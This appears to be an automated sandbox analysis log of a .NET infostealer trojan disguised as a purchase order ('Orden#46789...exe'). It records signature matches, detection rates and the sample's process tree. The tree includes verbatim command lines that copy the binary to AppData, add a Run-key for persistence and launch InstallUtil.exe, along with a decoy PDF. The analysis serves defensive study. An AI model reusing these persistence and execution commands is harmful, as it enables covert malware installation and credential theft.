                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0DAD557817_2_0DAD5578
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0DAD000617_2_0DAD0006
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0DAD004017_2_0DAD0040
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0DAD63F817_2_0DAD63F8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeCode function: 17_2_0780554F17_2_0780554F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_00BA4AC026_2_00BA4AC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_00BABB0626_2_00BABB06
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_00BAEDE726_2_00BAEDE7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_00BA3EA826_2_00BA3EA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_00BA41F026_2_00BA41F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_06167E5026_2_06167E50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_061666C026_2_061666C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0616C25026_2_0616C250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0616B2F026_2_0616B2F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0616312026_2_06163120
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0616777026_2_06167770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0616242126_2_06162421
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0616E47026_2_0616E470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0616004026_2_06160040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_061659AB26_2_061659AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0616000626_2_06160006
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2979921643.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Orden#46789_2024_Optoflux_mexico_sderls.exe
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7bc3a901-84f9-4a81-8277-20a61843655f.exe4 vs Orden#46789_2024_Optoflux_mexico_sderls.exe
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000000.2140546100.0000000000A78000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameturbomailer.exe8 vs Orden#46789_2024_Optoflux_mexico_sderls.exe
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2979580611.0000000000B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMiPro.dll, vs Orden#46789_2024_Optoflux_mexico_sderls.exe
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7bc3a901-84f9-4a81-8277-20a61843655f.exe4 vs Orden#46789_2024_Optoflux_mexico_sderls.exe
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMiPro.dll, vs Orden#46789_2024_Optoflux_mexico_sderls.exe
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7bc3a901-84f9-4a81-8277-20a61843655f.exe4 vs Orden#46789_2024_Optoflux_mexico_sderls.exe
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeBinary or memory string: OriginalFilenameturbomailer.exe8 vs Orden#46789_2024_Optoflux_mexico_sderls.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe"
                    Source: 16.2.vexplorerez.exe.47787c0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 16.2.vexplorerez.exe.46aceaa.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 16.2.vexplorerez.exe.4734a0a.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 16.2.vexplorerez.exe.4734a0a.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 16.2.vexplorerez.exe.46aceaa.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 17.2.vexplorerez.exe.3d7cc32.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 24.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 17.2.vexplorerez.exe.3e48548.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 17.2.vexplorerez.exe.3d7cc32.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 17.2.vexplorerez.exe.3e48548.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 16.2.vexplorerez.exe.47787c0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 17.2.vexplorerez.exe.3e04792.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 17.2.vexplorerez.exe.3e04792.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, b1K.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, roEs93G.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, roEs93G.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, JQn0Aia1.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, JQn0Aia1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: vexplorerez.exe, 00000011.00000002.4034654888.0000000000A7C000.00000004.00000020.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4034654888.0000000000ABB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@57/111@0/12
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Orden#46789_2024_Optoflux_mexico_sderls.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1948:120:WilError_03
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-06-27 02-57-06-503.log
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSystem information queried: HandleInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeReversingLabs: Detection: 68%
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeVirustotal: Detection: 72%
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeString found in binary or memory: ATTEMPTING TO EXIT THE BUILDER MAY INCOMPLETE RESOURCE-Installing Resource...
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeString found in binary or memory: Do you want to restart P Browser Builder now?/Installation completed!QCould not attempt to install resource!
                    Source: unknownProcess created: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe "C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe"
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 18 > nul && copy "C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe" "C:\Users\user\AppData\Roaming\vexplorerez.exe" && ping 127.0.0.1 -n 18 > nul && "C:\Users\user\AppData\Roaming\vexplorerez.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\vexplorerez.exe "C:\Users\user\AppData\Roaming\vexplorerez.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\vexplorerez.exe "C:\Users\user\AppData\Roaming\vexplorerez.exe"
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\PABILOS MOTORES #5 Y 6.pdf"
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1640,i,4044299627815770156,1797712374859853902,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://verificacfdi.facturaelectronica.sat.gob.mx/?id=39CA617E-9953-41BD-9564-C41A1E1C5584&re=OOMM710314363&rr=PCM910225B86&tt=6090.00&fe=aUIAsQ==
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2220,i,10829338155938960035,13974893323488573616,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\PABILOS MOTORES #5 Y 6.pdf"
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 18 > nul && copy "C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe" "C:\Users\user\AppData\Roaming\vexplorerez.exe" && ping 127.0.0.1 -n 18 > nul && "C:\Users\user\AppData\Roaming\vexplorerez.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\vexplorerez.exe "C:\Users\user\AppData\Roaming\vexplorerez.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\PABILOS MOTORES #5 Y 6.pdf"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\PABILOS MOTORES #5 Y 6.pdf"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1640,i,4044299627815770156,1797712374859853902,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2220,i,10829338155938960035,13974893323488573616,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeSection loaded: cryptbase.dllJump to behavior
